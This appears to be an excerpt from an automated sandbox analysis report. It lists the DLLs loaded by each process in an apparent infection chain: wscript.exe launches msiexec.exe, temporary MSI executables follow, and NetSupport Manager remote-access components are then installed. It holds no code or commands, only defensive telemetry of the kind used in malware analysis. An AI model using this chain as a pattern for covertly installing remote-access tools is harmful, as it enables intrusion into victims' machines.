                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msxml3.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mlang.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ondemandconnroutehelper.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: winhttp.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mswsock.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iphlpapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: winnsi.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dnsapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rasadhlp.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: fwpuclnt.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: schannel.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mskeyprotect.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ntasn1.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dpapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ncrypt.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ncryptsslp.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msdart.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: pcacli.dll
                                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sfc_os.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: msasn1.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: cryptsp.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: rsaenh.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: cryptbase.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: msisip.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: gpapi.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: rstrtmgr.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: ncrypt.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: ntasn1.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: pcacli.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: ntmarta.dll
                                Source: C:\Windows\System32\msiexec.exe Section loaded: cabinet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: vbscript.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: scrrun.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sxs.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntmarta.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\attrib.exe Section loaded: ulib.dll
                                Source: C:\Windows\SysWOW64\attrib.exe Section loaded: fsutilext.dll
                                Source: C:\Windows\Installer\MSI264F.tmp Section loaded: apphelp.dll
                                Source: C:\Windows\Installer\MSI264F.tmp Section loaded: shfolder.dll
                                Source: C:\Windows\Installer\MSI264F.tmp Section loaded: version.dll
                                Source: C:\Windows\Installer\MSI264F.tmp Section loaded: dwmapi.dll
                                Source: C:\Windows\Installer\MSI264F.tmp Section loaded: winmm.dll
                                Source: C:\Windows\Installer\MSI264F.tmp Section loaded: dbghelp.dll
                                Source: C:\Windows\Installer\MSI264F.tmp Section loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSI264F.tmp Section loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSI264F.tmp Section loaded: netapi32.dll
                                Source: C:\Windows\Installer\MSI264F.tmp Section loaded: samcli.dll
                                Source: C:\Windows\Installer\MSI264F.tmp Section loaded: netutils.dll
                                Source: C:\Windows\Installer\MSI264F.tmp Section loaded: samlib.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmp Section loaded: apphelp.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmp Section loaded: shfolder.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmp Section loaded: version.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmp Section loaded: dwmapi.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmp Section loaded: winmm.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmp Section loaded: dbghelp.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmp Section loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmp Section loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmp Section loaded: netapi32.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmp Section loaded: samcli.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmp Section loaded: netutils.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmp Section loaded: samlib.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe Section loaded: apphelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe Section loaded: winmm.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe Section loaded: version.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe Section loaded: dbghelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe Section loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: apphelp.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: shfolder.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: version.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: dwmapi.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: winmm.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: dbghelp.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: netapi32.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: samcli.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: netutils.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: samlib.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: uxtheme.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: ntmarta.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: msasn1.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: devrtl.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: spinf.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: drvstore.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: pciax.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: firewallapi.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: dnsapi.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: iphlpapi.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: fwbase.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: fwpolicyiomgr.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: windows.storage.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: wldp.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: profapi.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: propsys.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: linkinfo.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: ntshrui.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: srvcli.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: cscapi.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: dwmapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: ntmarta.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: client32provider.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: apphelp.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: shfolder.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: version.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: dwmapi.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: winmm.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: dbghelp.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: netapi32.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: samcli.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: netutils.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: samlib.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcicl32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: shfolder.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: mpr.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winmm.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wsock32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcp100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: activeds.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: netapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wininet.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: adsldpc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: samcli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wkscli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dbghelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dbgcore.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wtsapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcichek.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: powrprof.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: umpdc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winsta.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: devobj.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcicapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: riched32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: riched20.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: usp10.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msls31.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: firewallapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: fwbase.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: fwpolicyiomgr.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: websocket.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: pcictl.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: shfolder.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: winmm.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: mpr.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: wsock32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: pcichek.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: dwmapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: msvcp100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: wininet.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: dbghelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeSection loaded: dbgcore.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcicl32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: shfolder.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: mpr.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winmm.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wsock32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcp100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: activeds.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: netapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wininet.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: adsldpc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: samcli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wkscli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dbghelp.dll
